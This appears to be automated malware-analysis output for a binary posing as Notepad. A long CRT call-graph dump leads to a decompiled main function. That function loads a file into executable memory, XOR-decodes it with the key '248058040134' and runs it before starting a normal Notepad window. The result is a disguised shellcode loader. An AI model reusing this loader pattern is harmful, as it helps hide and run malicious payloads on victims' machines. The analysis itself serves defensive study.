13610->13611 13830 10b302a 13611->13830 13613 10b3154 13615 10b318f 13613->13615 13621 10b31b2 13613->13621 13629 10b328c 13613->13629 13614 10b3883 13614->13570 13616 10a60e3 __read_nolock 70 API calls 13615->13616 13617 10b3194 13616->13617 13618 10a6117 _wprintf 70 API calls 13617->13618 13619 10b31a1 13618->13619 13622 10a4035 _wprintf 9 API calls 13619->13622 13620 10b3270 13623 10a60e3 __read_nolock 70 API calls 13620->13623 13621->13620 13628 10b324e 13621->13628 13622->13609 13624 10b3275 13623->13624 13625 10a6117 _wprintf 70 API calls 13624->13625 13626 10b3282 13625->13626 13627 10a4035 _wprintf 9 API calls 13626->13627 13627->13629 13696 10ae50e 13628->13696 13629->13610 13631 10b331c 13632 10b3347 13631->13632 13633 10b3326 13631->13633 13717 10b2ebb 13632->13717 13635 10a60e3 __read_nolock 70 API calls 13633->13635 13636 10b332b 13635->13636 13637 10a6117 _wprintf 70 API calls 13636->13637 13639 10b3335 13637->13639 13638 10b33e7 GetFileType 13640 10b33f2 GetLastError 13638->13640 13641 10b3434 13638->13641 13643 10a6117 _wprintf 70 API calls 13639->13643 13644 10a60f6 __dosmaperr 70 API calls 13640->13644 13727 10ae8cb 13641->13727 13642 10b33b5 GetLastError 13646 10a60f6 __dosmaperr 70 API calls 13642->13646 13643->13609 13648 10b3419 CloseHandle 13644->13648 13647 10b33da 13646->13647 13653 10a6117 _wprintf 70 API calls 13647->13653 13648->13647 13651 10b3427 13648->13651 13649 10b2ebb ___createFile 5 API calls 13652 10b33aa 13649->13652 13654 10a6117 _wprintf 70 API calls 13651->13654 13652->13638 13652->13642 13653->13629 13655 10b342c 13654->13655 13655->13647 13656 10b360d 13656->13629 13659 10b37e0 CloseHandle 13656->13659 13661 10b2ebb ___createFile 5 API calls 13659->13661 13662 10b3807 13661->13662 13664 10b380f GetLastError 13662->13664 13665 10b3697 13662->13665 13666 10a60f6 __dosmaperr 70 API calls 13664->13666 13665->13629 13667 10b34db 13676 10b34d3 13667->13676 13745 10b4eb3 13667->13745 13763 10b58b7 13667->13763 13670 10a6885 83 API calls __read_nolock 13670->13676 13674 10b368a 13675 10b4eb3 __wsopen_nolock 74 API calls 13674->13675 13677 10b3691 13675->13677 13676->13656 13676->13667 13676->13670 13676->13674 13679 10a7289 73 API calls __lseeki64_nolock 13676->13679 13794 10a9ce9 13676->13794 13678 10a6117 _wprintf 70 API calls 13677->13678 13678->13665 13679->13676 13685 10a60e3 13680->13685 13682 10a60ff __dosmaperr 13683 10a6117 _wprintf 70 API calls 13682->13683 13684 10a6112 13683->13684 13684->13599 13686 10a7a18 __getptd_noexit 70 API calls 13685->13686 13687 10a60e8 13686->13687 13687->13682 13688->13602 13690 10b5b69 13689->13690 13691 10b5b7e 13689->13691 13692 10a6117 _wprintf 70 API calls 13690->13692 13691->13613 13693 10b5b6e 13692->13693 13694 10a4035 _wprintf 9 API calls 13693->13694 13695 10b5b79 13694->13695 13695->13613 13697 10ae51a _wprintf 13696->13697 13698 10a88dc __mtinitlocknum 70 API calls 13697->13698 13699 10ae52b 13698->13699 13702 10ae530 _wprintf 13699->13702 13841 10a732b InitOnceExecuteOnce 13699->13841 13701 10ae53d 13701->13702 13703 10a8834 __lock 70 API calls 13701->13703 13702->13631 13704 10ae548 13703->13704 13705 10ae69d 13704->13705 13706 10ae624 13704->13706 13709 10a8834 __lock 70 API calls 13704->13709 13710 10ae5c4 EnterCriticalSection 13704->13710 13713 10ae5a2 InitializeCriticalSectionAndSpinCount 13704->13713 13842 10ae5ec 13704->13842 13854 10ae6b4 13705->13854 13708 10a8c83 __calloc_crt 70 API calls 13706->13708 13711 10ae62d 13708->13711 13709->13704 13710->13704 13712 10ae5d4 LeaveCriticalSection 13710->13712 13711->13705 13845 10ae482 13711->13845 13712->13704 13713->13704 13716 10ae692 13716->13705 13718 10a80fe ___crtIsPackagedApp 2 API calls 13717->13718 13719 10b2ec7 13718->13719 13720 10b2ecb GetModuleHandleW GetProcAddress 13719->13720 13721 10b2eed 13719->13721 13720->13721 13722 10b2ee8 13720->13722 13723 10a80fe ___crtIsPackagedApp 2 API calls 13721->13723 13726 10b2efc 13722->13726 13724 10b2ef5 13723->13724 13725 10b2f2e CreateFileW 13724->13725 13724->13726 13725->13726 13726->13638 13726->13642 13726->13649 13728 10ae933 13727->13728 13729 10ae8d7 13727->13729 13730 10a6117 _wprintf 70 API calls 13728->13730 13729->13728 13734 10ae8f9 13729->13734 13731 10ae938 13730->13731 13733 10a60e3 __read_nolock 70 API calls 13731->13733 13732 10ae924 13732->13656 13732->13676 13736 10a7289 13732->13736 13733->13732 13734->13732 13735 10ae91e SetStdHandle 13734->13735 13735->13732 13857 10ae743 13736->13857 13871 10a732b InitOnceExecuteOnce 13745->13871 13747 10b4ebb 13748 10b4ebf 13747->13748 13749 10ae743 __get_osfhandle 71 API calls 13747->13749 13748->13667 13764 10a7289 __lseeki64_nolock 73 API calls 13763->13764 13765 10b58d4 13764->13765 13795 10a9cf5 _wprintf 13794->13795 13796 10a9cfd 13795->13796 13797 10a9d15 13795->13797 13799 10a60e3 __read_nolock 70 API calls 13796->13799 13935 10a732b InitOnceExecuteOnce 13797->13935 13832 10b3036 _wprintf 13830->13832 13831 10b3048 13833 10a6117 _wprintf 70 API calls 13831->13833 13832->13831 13834 10b307f 13832->13834 13835 10b304d 13833->13835 13836 10b30f1 __wsopen_nolock 136 API calls 13834->13836 13837 10a4035 _wprintf 9 API calls 13835->13837 13838 10b309c 13836->13838 13839 10b3057 _wprintf 13837->13839 13939 10b30c5 13838->13939 13839->13614 13841->13701 13843 10a89b8 _doexit LeaveCriticalSection 13842->13843 13844 10ae5f3 13843->13844 13844->13704 13847 10ae48e _wprintf 13845->13847 13846 10ae4db EnterCriticalSection 13849 10ae501 _wprintf 13846->13849 13847->13846 13848 10a8834 __lock 70 API calls 13847->13848 13850 10ae4b2 13848->13850 13849->13716 13851 10ae4cf 13850->13851 13852 10ae4bd InitializeCriticalSectionAndSpinCount 13850->13852 13853 10ae505 ___lock_fhandle LeaveCriticalSection 13851->13853 13852->13851 13853->13846 13855 10a89b8 _doexit LeaveCriticalSection 13854->13855 13856 10ae6bb 13855->13856 13856->13702 13858 10ae74f 13857->13858 13859 10ae764 13857->13859 13861 10a60e3 __read_nolock 70 API calls 13858->13861 13860 10a732b __ioinit InitOnceExecuteOnce 13859->13860 13865 10ae769 13860->13865 13862 10ae754 13861->13862 13871->13747 13940 10b30cb 13939->13940 13942 10b30ef 13939->13942 13941 10ae94d __unlock_fhandle LeaveCriticalSection 13940->13941 13941->13942 13942->13839 13943->13575 13945 10addc5 13944->13945 13950 10addbe _strncmp 13944->13950 13946 10a9233 _LocaleUpdate::_LocaleUpdate 80 API calls 13945->13946 13947 10addd2 13946->13947 13948 10a6117 _wprintf 70 API calls 13947->13948 13947->13950 13949 10ade05 13948->13949 13951 10a4035 _wprintf 9 API calls 13949->13951 13950->13550 13951->13950 13953 10a9233 _LocaleUpdate::_LocaleUpdate 80 API calls 13952->13953 13954 10adef1 13953->13954 13955 10adf1c 13954->13955 13956 10adf06 13954->13956 13961 10a603c 13954->13961 13958 10a6117 _wprintf 70 API calls 13955->13958 13955->13961 13962 10b3908 13956->13962 13959 10adf2f 13958->13959 13960 10a4035 _wprintf 9 API calls 13959->13960 13960->13961 13961->13513 13961->13524 13963 10b3956 13962->13963 13964 10b3915 13962->13964 13976 10b3973 13963->13976 13966 10b391b 13964->13966 13969 10b3938 13964->13969 13968 10a6117 _wprintf 70 API calls 13966->13968 13967 10b392b 13967->13961 13970 10b3920 13968->13970 13969->13963 13971 10b3942 13969->13971 13972 10a4035 _wprintf 9 API calls 13970->13972 13973 10a6117 _wprintf 70 API calls 13971->13973 13972->13967 13974 10b3947 13973->13974 13975 10a4035 _wprintf 9 API calls 13974->13975 13975->13967 13977 10b3a1e 13976->13977 13978 10b3983 13976->13978 13977->13967 13979 10a9233 _LocaleUpdate::_LocaleUpdate 80 API calls 13978->13979 13980 10b3991 13979->13980 13981 10b39ab 13980->13981 13987 10b39bd 13980->13987 13982 10a6117 _wprintf 70 API calls 13981->13982 13983 10b39b0 13982->13983 13984 10a4035 _wprintf 9 API calls 13983->13984 13985 10b39bb ___ascii_strnicmp 13984->13985 13985->13967 13986 10b5e1c 87 API calls __tolower_l 13986->13987 13987->13985 13987->13986 13989 10a4c72 13988->13989 13990 10a4c91 LeaveCriticalSection 13988->13990 13989->13990 13991 10a4c79 13989->13991 13990->13529 13994 10a89b8 LeaveCriticalSection 13991->13994 13993 10a4c8e 13993->13529 13994->13993 13996 10a4c26 EnterCriticalSection 13995->13996 13997 10a4c04 13995->13997 13999 10a3cbc 13996->13999 13997->13996 13998 10a4c0c 13997->13998 14000 10a8834 __lock 70 API calls 13998->14000 14001 10a3be7 13999->14001 14000->13999 14002 10a3c05 14001->14002 14003 10a3bf5 14001->14003 14005 10a3c1b 14002->14005 14056 10a3826 14002->14056 14004 10a6117 _wprintf 70 API calls 14003->14004 14012 10a3bfa 14004->14012 14016 10a4d10 14005->14016 14010 10a3c5c 14029 10a701f 14010->14029 14013 10a3ced 14012->14013 14014 10a4c63 _fwprintf 2 API calls 14013->14014 14015 10a3cf3 14014->14015 14015->13454 14017 10a4d23 14016->14017 14018 10a3c2e 14016->14018 14017->14018 14019 10a66b0 __fflush_nolock 70 API calls 14017->14019 14022 10a66b0 14018->14022 14020 10a4d40 14019->14020 14021 10a9ce9 __write 103 API calls 14020->14021 14021->14018 14023 10a66ba 14022->14023 14024 10a66cf 14022->14024 14025 10a6117 _wprintf 70 API calls 14023->14025 14024->14010 14026 10a66bf 14025->14026 14027 10a4035 _wprintf 9 API calls 14026->14027 14028 10a66ca 14027->14028 14028->14010 14030 10a702b _wprintf 14029->14030 14031 10a704b 14030->14031 14032 10a7033 14030->14032 14085 10a732b InitOnceExecuteOnce 14031->14085 14033 10a60e3 __read_nolock 70 API calls 14032->14033 14035 10a7038 14033->14035 14036 10a6117 _wprintf 70 API calls 14035->14036 14042 10a7040 _wprintf 14036->14042 14037 10a70ed 14038 10a60e3 __read_nolock 70 API calls 14037->14038 14040 10a70f2 14038->14040 14039 10a7050 14039->14037 14041 10a708a 14039->14041 14039->14042 14043 10a6117 _wprintf 70 API calls 14040->14043 14044 10ae482 ___lock_fhandle 72 API calls 14041->14044 14042->14012 14045 10a70fa 14043->14045 14046 10a7090 14044->14046 14047 10a4035 _wprintf 9 API calls 14045->14047 14048 10a70a3 14046->14048 14049 10a70b6 14046->14049 14047->14042 14086 10a710e 14048->14086 14051 10a6117 _wprintf 70 API calls 14049->14051 14053 10a70bb 14051->14053 14052 10a70af 14096 10a70e5 14052->14096 14054 10a60e3 __read_nolock 70 API calls 14053->14054 14054->14052 14057 10a3833 __ftell_nolock 14056->14057 14058 10a384b 14057->14058 14059 10a3863 14057->14059 14060 10a6117 _wprintf 70 API calls 14058->14060 14061 10a66b0 __fflush_nolock 70 API calls 14059->14061 14062 10a3850 14060->14062 14063 10a386a 14061->14063 14064 10a4035 _wprintf 9 API calls 14062->14064 14065 10a701f __write 76 API calls 14063->14065 14074 10a385b 14064->14074 14066 10a3886 14065->14066 14069 10a3a70 14066->14069 14070 10a38f6 14066->14070 14066->14074 14067 10a5b2a __wsetlocale_set_cat 6 API calls 14068 10a3b7d 14067->14068 14068->14005 14071 10a3a76 14069->14071 14077 10a3a1b 14069->14077 14073 10a3923 14070->14073 14070->14077 14072 10a6117 _wprintf 70 API calls 14071->14072 14072->14074 14073->14074 14100 10a7180 14073->14100 14074->14067 14076 10a3955 14076->14074 14080 10a3981 ReadFile 14076->14080 14077->14074 14078 10a701f __write 76 API calls 14077->14078 14079 10a3ad6 14078->14079 14079->14074 14083 10a701f __write 76 API calls 14079->14083 14080->14074 14081 10a39a7 14080->14081 14082 10a701f __write 76 API calls 14081->14082 14084 10a39b5 14082->14084 14083->14074 14084->14074 14085->14039 14087 10ae743 __get_osfhandle 71 API calls 14086->14087 14088 10a711b 14087->14088 14089 10a7131 SetFilePointer 14088->14089 14090 10a7121 14088->14090 14092 10a714a GetLastError 14089->14092 14093 10a7152 14089->14093 14091 10a6117 _wprintf 70 API calls 14090->14091 14095 10a7126 14091->14095 14092->14093 14094 10a60f6 __dosmaperr 70 API calls 14093->14094 14093->14095 14094->14095 14095->14052 14099 10ae94d LeaveCriticalSection 14096->14099 14098 10a70eb 14098->14042 14099->14098 14101 10a718c _wprintf 14100->14101 14102 10a719d 14101->14102 14103 10a71b5 14101->14103 14105 10a60e3 __read_nolock 70 API calls 14102->14105 14127 10a732b InitOnceExecuteOnce 14103->14127 14106 10a71a2 14105->14106 14107 10a6117 _wprintf 70 API calls 14106->14107 14108 10a71aa _wprintf 14107->14108 14108->14076 14109 10a7267 14111 10a60e3 __read_nolock 70 API calls 14109->14111 14110 10a71ba 14110->14108 14110->14109 14112 10a71f7 14110->14112 14113 10a726c 14111->14113 14114 10ae482 ___lock_fhandle 72 API calls 14112->14114 14115 10a6117 _wprintf 70 API calls 14113->14115 14116 10a71fd 14114->14116 14117 10a7274 14115->14117 14118 10a722b 14116->14118 14119 10a7213 14116->14119 14120 10a4035 _wprintf 9 API calls 14117->14120 14122 10a6117 _wprintf 70 API calls 14118->14122 14121 10a7289 __lseeki64_nolock 73 API calls 14119->14121 14120->14108 14123 10a7222 14121->14123 14124 10a7230 14122->14124 14128 10a725f 14123->14128 14125 10a60e3 __read_nolock 70 API calls 14124->14125 14125->14123 14127->14110 14131 10ae94d LeaveCriticalSection 14128->14131 14130 10a7265 14130->14108 14131->14130 14133 10a4c63 _fwprintf 2 API calls 14132->14133 14134 10a3be5 14133->14134 14134->13467 14136 10a37a1 _wprintf 14135->14136 14137 10a37e4 14136->14137 14139 10a37b7 _memset 14136->14139 14147 10a37dc _wprintf 14136->14147 14138 10a4bf4 __lock_file 71 API calls 14137->14138 14140 10a37ea 14138->14140 14141 10a6117 _wprintf 70 API calls 14139->14141 14148 10a35b7 14140->14148 14143 10a37d1 14141->14143 14144 10a4035 _wprintf 9 API calls 14143->14144 14144->14147 14147->13470 14149 10a35ed 14148->14149 14152 10a35d2 _memset 14148->14152 14162 10a381e 14149->14162 14150 10a35dd 14151 10a6117 _wprintf 70 API calls 14150->14151 14161 10a35e2 14151->14161 14152->14149 14152->14150 14155 10a362b 14152->14155 14153 10a4035 _wprintf 9 API calls 14153->14149 14155->14149 14156 10a373c _memset 14155->14156 14157 10a66b0 __fflush_nolock 70 API calls 14155->14157 14165 10a6885 14155->14165 14235 10a6582 14155->14235 14257 10a40b0 14155->14257 14159 10a6117 _wprintf 70 API calls 14156->14159 14157->14155 14159->14161 14161->14153 14163 10a4c63 _fwprintf 2 API calls 14162->14163 14164 10a3824 14163->14164 14164->14147 14166 10a68bd 14165->14166 14167 10a68a6 14165->14167 14271 10a732b InitOnceExecuteOnce 14166->14271 14168 10a60e3 __read_nolock 70 API calls 14167->14168 14170 10a68ab 14168->14170 14171 10a6117 _wprintf 70 API calls 14170->14171 14172 10a68b2 14171->14172 14172->14155 14173 10a7000 14174 10a60e3 __read_nolock 70 API calls 14173->14174 14176 10a7005 14174->14176 14175 10a68c2 14175->14172 14175->14173 14177 10a6902 14175->14177 14178 10a6117 _wprintf 70 API calls 14176->14178 14179 10a690a 14177->14179 14184 10a6921 14177->14184 14180 10a6916 14178->14180 14181 10a60e3 __read_nolock 70 API calls 14179->14181 14183 10a4035 _wprintf 9 API calls 14180->14183 14182 10a690f 14181->14182 14186 10a6117 _wprintf 70 API calls 14182->14186 14183->14172 14184->14172 14185 10a6936 14184->14185 14188 10a6950 14184->14188 14189 10a696e 14184->14189 14187 10a60e3 __read_nolock 70 API calls 14185->14187 14186->14180 14187->14182 14188->14185 14193 10a695b 14188->14193 14190 10a8ccd __malloc_crt 70 API calls 14189->14190 14191 10a697e 14190->14191 14194 10a69a1 14191->14194 14195 10a6986 14191->14195 14272 10ae41e 14193->14272 14199 10a7289 __lseeki64_nolock 73 API calls 14194->14199 14197 10a6117 _wprintf 70 API calls 14195->14197 14200 10a698b 14197->14200 14198 10a6ae8 ReadFile 14201 10a6b0a 14198->14201 14202 10a6fc8 GetLastError 14198->14202 14199->14193 14204 10a60e3 __read_nolock 70 API calls 14200->14204 14201->14202 14209 10a6ada 14201->14209 14205 10a6ac8 14202->14205 14206 10a6fd5 14202->14206 14203 10a6a85 GetConsoleMode 14207 10a6a99 14203->14207 14208 10a6ae5 14203->14208 14204->14172 14214 10a60f6 __dosmaperr 70 API calls 14205->14214 14228 10a6ace 14205->14228 14210 10a6117 _wprintf 70 API calls 14206->14210 14207->14208 14211 10a6a9f ReadConsoleW 14207->14211 14208->14198 14219 10a6b3f 14209->14219 14220 10a6dac 14209->14220 14209->14228 14212 10a6fda 14210->14212 14211->14209 14213 10a6ac2 GetLastError 14211->14213 14215 10a60e3 __read_nolock 70 API calls 14212->14215 14213->14205 14214->14228 14215->14228 14216 10a8c4b _free 70 API calls 14216->14172 14218 10a6bab ReadFile 14222 10a6bcc GetLastError 14218->14222 14233 10a6bd6 14218->14233 14219->14218 14225 10a6c2c 14219->14225 14221 10a6eb2 ReadFile 14220->14221 14220->14228 14227 10a6ed5 GetLastError 14221->14227 14234 10a6ee3 14221->14234 14222->14233 14223 10a6ce9 14229 10a6c99 MultiByteToWideChar 14223->14229 14230 10a7289 __lseeki64_nolock 73 API calls 14223->14230 14224 10a6cd9 14226 10a6117 _wprintf 70 API calls 14224->14226 14225->14223 14225->14224 14225->14228 14225->14229 14226->14228 14227->14234 14228->14172 14228->14216 14229->14213 14229->14228 14230->14229 14231 10a7289 __lseeki64_nolock 73 API calls 14231->14233 14232 10a7289 __lseeki64_nolock 73 API calls 14232->14234 14233->14219 14233->14231 14234->14220 14234->14232 14236 10a658d 14235->14236 14237 10a65a2 14235->14237 14238 10a6117 _wprintf 70 API calls 14236->14238 14283 10a732b InitOnceExecuteOnce 14237->14283 14240 10a6592 14238->14240 14241 10a4035 _wprintf 9 API calls 14240->14241 14242 10a659d 14241->14242 14242->14155 14243 10a65a7 14243->14242 14244 10a65e4 14243->14244 14284 10ae1d7 14243->14284 14246 10a66b0 __fflush_nolock 70 API calls 14244->14246 14247 10a65f8 14246->14247 14287 10a6770 14247->14287 14249 10a65ff 14249->14242 14250 10a66b0 __fflush_nolock 70 API calls 14249->14250 14251 10a6622 14250->14251 14251->14242 14252 10a66b0 __fflush_nolock 70 API calls 14251->14252 14253 10a662e 14252->14253 14253->14242 14254 10a66b0 __fflush_nolock 70 API calls 14253->14254 14255 10a663b 14254->14255 14256 10a66b0 __fflush_nolock 70 API calls 14255->14256 14256->14242 14258 10a40bf 14257->14258 14267 10a40bb _memmove 14257->14267 14259 10a40d9 _memset 14258->14259 14260 10a40c6 14258->14260 14264 10a4110 14259->14264 14265 10a4107 14259->14265 14259->14267 14261 10a6117 _wprintf 70 API calls 14260->14261 14262 10a40cb 14261->14262 14263 10a4035 _wprintf 9 API calls 14262->14263 14263->14267 14264->14267 14269 10a6117 _wprintf 70 API calls 14264->14269 14266 10a6117 _wprintf 70 API calls 14265->14266 14268 10a410c 14266->14268 14267->14155 14270 10a4035 _wprintf 9 API calls 14268->14270 14269->14268 14270->14267 14271->14175 14273 10ae42a 14272->14273 14274 10ae437 14272->14274 14275 10a6117 _wprintf 70 API calls 14273->14275 14282 10a732b InitOnceExecuteOnce 14274->14282 14278 10a6a6f 14275->14278 14277 10ae43c 14277->14278 14279 10a6117 _wprintf 70 API calls 14277->14279 14278->14198 14278->14203 14280 10ae472 14279->14280 14281 10a4035 _wprintf 9 API calls 14280->14281 14281->14278 14282->14277 14283->14243 14285 10a8ccd __malloc_crt 70 API calls 14284->14285 14286 10ae1ec 14285->14286 14286->14244 14288 10a677c _wprintf 14287->14288 14289 10a679c 14288->14289 14290 10a6784 14288->14290 14319 10a732b InitOnceExecuteOnce 14289->14319 14291 10a60e3 __read_nolock 70 API calls 14290->14291 14293 10a6789 14291->14293 14294 10a6117 _wprintf 70 API calls 14293->14294 14296 10a6791 _wprintf 14294->14296 14295 10a6864 14298 10a60e3 __read_nolock 70 API calls 14295->14298 14296->14249 14297 10a67a1 14297->14295 14297->14296 14299 10a67df 14297->14299 14300 10a6869 14298->14300 14301 10a67ec 14299->14301 14302 10a6801 14299->14302 14303 10a6117 _wprintf 70 API calls 14300->14303 14304 10a60e3 __read_nolock 70 API calls 14301->14304 14305 10ae482 ___lock_fhandle 72 API calls 14302->14305 14306 10a67f9 14303->14306 14307 10a67f1 14304->14307 14308 10a6807 14305->14308 14312 10a4035 _wprintf 9 API calls 14306->14312 14309 10a6117 _wprintf 70 API calls 14307->14309 14310 10a681a 14308->14310 14311 10a682d 14308->14311 14309->14306 14314 10a6885 __read_nolock 83 API calls 14310->14314 14313 10a6117 _wprintf 70 API calls 14311->14313 14312->14296 14315 10a6832 14313->14315 14316 10a6826 14314->14316 14317 10a60e3 __read_nolock 70 API calls 14315->14317 14320 10a685c 14316->14320 14317->14316 14319->14297 14323 10ae94d LeaveCriticalSection 14320->14323 14322 10a6862 14322->14296 14323->14322 14327 10a66e0 14324->14327 14328 10a1786 lstrcpyW GetSaveFileNameW 14327->14328 14328->13474 14332 10a469e 14329->14332 14331 10a44f8 14333 10a46aa _wprintf 14332->14333 14334 10a8834 __lock 63 API calls 14333->14334 14335 10a46b1 14334->14335 14336 10a476a __initterm 14335->14336 14337 10a46df DecodePointer 14335->14337 14352 10a47b8 14336->14352 14337->14336 14339 10a46f6 DecodePointer 14337->14339 14345 10a4706 14339->14345 14341 10a47c7 _wprintf 14341->14331 14343 10a4713 EncodePointer 14343->14345 14344 10a47af 14346 10a47b8 14344->14346 14347 10a43c0 __mtinitlocknum 3 API calls 14344->14347 14345->14336 14345->14343 14349 10a4723 DecodePointer EncodePointer 14345->14349 14348 10a47c5 14346->14348 14357 10a89b8 LeaveCriticalSection 14346->14357 14347->14346 14348->14331 14351 10a4735 DecodePointer DecodePointer 14349->14351 14351->14345 14353 10a47be 14352->14353 14354 10a4798 14352->14354 14358 10a89b8 LeaveCriticalSection 14353->14358 14354->14341 14356 10a89b8 LeaveCriticalSection 14354->14356 14356->14344 14357->14348 14358->14354

                                                  Executed Functions

                                                  Function 010A28A0 Relevance: 54.4, APIs: 27, Strings: 4, Instructions: 181windowregistrymemoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 73%
                                                  			E010A28A0(void* __edx, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a12, int _a16) {
				struct _WNDCLASSEXW _v52;
				struct tagMONITORINFO _v100;
				struct tagMSG _v128;
				struct HACCEL__* _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t38;
				long _t40;
				void* _t42;
				char* _t47;
				int _t49;
				struct HMONITOR__* _t54;
				int _t62;
				int _t65;
				int _t67;
				int _t69;
				void* _t78;
				void* _t80;
				void* _t81;
				int _t85;
				void* _t92;
				long _t93;
				struct HINSTANCE__* _t94;
				void* _t99;
				signed int _t100;

				_push(_t80);
				_push(_t92);
				_t38 = E010A3542(_a12, "rb"); // executed
				_push(2);
				_t99 = _t38;
				_push(0);
				_push(_t99); // executed
				E010A3C76(_t80, __edx, _t92, _t99, __eflags); // executed
				_push(_t99); // executed
				_t40 = E010A3B7F(_t80, __edx, _t92, _t99, __eflags); // executed
				_t93 = _t40;
				_push(0);
				_push(0);
				_push(_t99); // executed
				E010A3C76(_t80, __edx, _t93, _t99, __eflags); // executed
				_t42 = VirtualAlloc(0, _t93, 0x3000, 0x40); // executed
				_t81 = _t42;
				E010A377A(_t81, _t93, 1, _t99); // executed
				_t100 = 0;
				if(_t93 != 0) {
					do {
						_t78 = _t100 - ((0xaaaaaaab * _t100 >> 0x20 >> 3) + (0xaaaaaaab * _t100 >> 0x20 >> 3) * 2 << 2);
						_t100 = _t100 + 1;
						_t8 = _t78 + "248058040134"; // 0x30383432
						 *(_t81 + _t100 - 1) =  *(_t81 + _t100 - 1) ^  *_t8;
					} while (_t100 < _t93);
				}
				 *_t81(); // executed
				__imp__#17();
				 *0x10c2dac = RegisterWindowMessageW(L"commdlg_FindReplace");
				E010A66E0(0x10c3f20, 0, 0x11f4);
				_t94 = _a4;
				 *0x10c3f20 = _t94;
				_t85 = 0x30;
				_t47 =  &_v52;
				do {
					 *_t47 = 0;
					_t47 = _t47 + 1;
					_t85 = _t85 - 1;
				} while (_t85 != 0);
				_v52.cbSize = 0x30;
				_v52.lpfnWndProc = 0x10a2890;
				_v52.hInstance = _t94;
				_v52.hIcon = LoadIconW(_t94, 0x300);
				_t49 = GetSystemMetrics(0x32);
				_v52.hIconSm = LoadImageW( *0x10c3f20, 0x300, 1, GetSystemMetrics(0x31), _t49, 0x8000);
				_v52.hCursor = LoadCursorW(0, 0x7f00);
				_v52.hbrBackground = 6;
				_v52.lpszMenuName = 0x201;
				_v52.lpszClassName = L"Notepad";
				_t54 = RegisterClassExW( &_v52);
				if(_t54 != 0) {
					__imp__MonitorFromRect(0x10c2d9c, 1);
					_v100.cbSize = 0x28;
					GetMonitorInfoW(_t54,  &_v100);
					__eflags =  *0x10c3f24;
					if( *0x10c3f24 == 0) {
						ExitProcess(1);
					}
					E010A1420();
					ShowWindow( *0x10c3f24, _a16);
					UpdateWindow( *0x10c3f24);
					DragAcceptFiles( *0x10c3f24, 1);
					GetCommandLineW();
					_v132 = LoadAcceleratorsW(_t94, 0x203);
					_t62 = GetMessageW( &_v128, 0, 0, 0);
					__eflags = _t62;
					if(_t62 != 0) {
						do {
							_t65 = IsDialogMessageW( *0x10c3f28,  &_v128);
							__eflags = _t65;
							if(_t65 == 0) {
								_t69 = TranslateAcceleratorW( *0x10c3f24, _v132,  &_v128);
								__eflags = _t69;
								if(_t69 == 0) {
									TranslateMessage( &_v128);
									DispatchMessageW( &_v128);
								}
							}
							_t67 = GetMessageW( &_v128, 0, 0, 0);
							__eflags = _t67;
						} while (_t67 != 0);
					}
					return _v128.wParam;
				} else {
					return 0;
				}
			}






























                                                  0x010a28a9
                                                  0x010a28ab
                                                  0x010a28b4
                                                  0x010a28b9
                                                  0x010a28bb
                                                  0x010a28bd
                                                  0x010a28bf
                                                  0x010a28c0
                                                  0x010a28c8
                                                  0x010a28c9
                                                  0x010a28d1
                                                  0x010a28d3
                                                  0x010a28d5
                                                  0x010a28d7
                                                  0x010a28d8
                                                  0x010a28ea
                                                  0x010a28f3
                                                  0x010a28f7
                                                  0x010a28ff
                                                  0x010a2903
                                                  0x010a2905
                                                  0x010a2917
                                                  0x010a2919
                                                  0x010a291a
                                                  0x010a2920
                                                  0x010a2924
                                                  0x010a2905
                                                  0x010a2928
                                                  0x010a292a
                                                  0x010a2947
                                                  0x010a294d
                                                  0x010a2952
                                                  0x010a2958
                                                  0x010a295e
                                                  0x010a2963
                                                  0x010a2967
                                                  0x010a2967
                                                  0x010a296a
                                                  0x010a296d
                                                  0x010a296d
                                                  0x010a2976
                                                  0x010a297e
                                                  0x010a2986
                                                  0x010a299d
                                                  0x010a29a1
                                                  0x010a29c3
                                                  0x010a29d0
                                                  0x010a29d9
                                                  0x010a29e1
                                                  0x010a29ec
                                                  0x010a29f7
                                                  0x010a2a00
                                                  0x010a2a14
                                                  0x010a2a20
                                                  0x010a2a28
                                                  0x010a2a2e
                                                  0x010a2a35
                                                  0x010a2a39
                                                  0x010a2a39
                                                  0x010a2a3f
                                                  0x010a2a4d
                                                  0x010a2a59
                                                  0x010a2a67
                                                  0x010a2a6d
                                                  0x010a2a89
                                                  0x010a2a94
                                                  0x010a2a96
                                                  0x010a2a98
                                                  0x010a2ab0
                                                  0x010a2abb
                                                  0x010a2ac1
                                                  0x010a2ac3
                                                  0x010a2ad4
                                                  0x010a2ada
                                                  0x010a2adc
                                                  0x010a2ae3
                                                  0x010a2aea
                                                  0x010a2aea
                                                  0x010a2adc
                                                  0x010a2af7
                                                  0x010a2af9
                                                  0x010a2af9
                                                  0x010a2ab0
                                                  0x010a2b07
                                                  0x010a2a02
                                                  0x010a2a0a
                                                  0x010a2a0a

                                                  APIs
                                                    • Part of subcall function 010A3542: __fsopen.LIBCMT ref: 010A354D
                                                  • _fseek.LIBCMT ref: 010A28C0
                                                  • _fseek.LIBCMT ref: 010A28D8
                                                    • Part of subcall function 010A3C76: __lock_file.LIBCMT ref: 010A3CB7
                                                    • Part of subcall function 010A3C76: __fseek_nolock.LIBCMT ref: 010A3CC6
                                                  • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040,?,?,?,?,?,?,?,?,00000000), ref: 010A28EA
                                                  • __fread_nolock.LIBCMT ref: 010A28F7
                                                  • #17.COMCTL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 010A2928
                                                  • RegisterWindowMessageW.USER32(commdlg_FindReplace,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 010A2935
                                                  • _memset.LIBCMT ref: 010A294D
                                                  • LoadIconW.USER32 ref: 010A298A
                                                  • GetSystemMetrics.USER32 ref: 010A29A1
                                                  • GetSystemMetrics.USER32 ref: 010A29A6
                                                  • LoadImageW.USER32 ref: 010A29B6
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 010A29CA
                                                  • RegisterClassExW.USER32 ref: 010A29F7
                                                  • MonitorFromRect.USER32(010C2D9C,00000001), ref: 010A2A14
                                                  • GetMonitorInfoW.USER32 ref: 010A2A28
                                                  • ExitProcess.KERNEL32 ref: 010A2A39
                                                    • Part of subcall function 010A1420: GetWindowTextLengthW.USER32(76F12D10), ref: 010A1427
                                                    • Part of subcall function 010A1420: SendMessageW.USER32(000000B8,00000000,00000000), ref: 010A143E
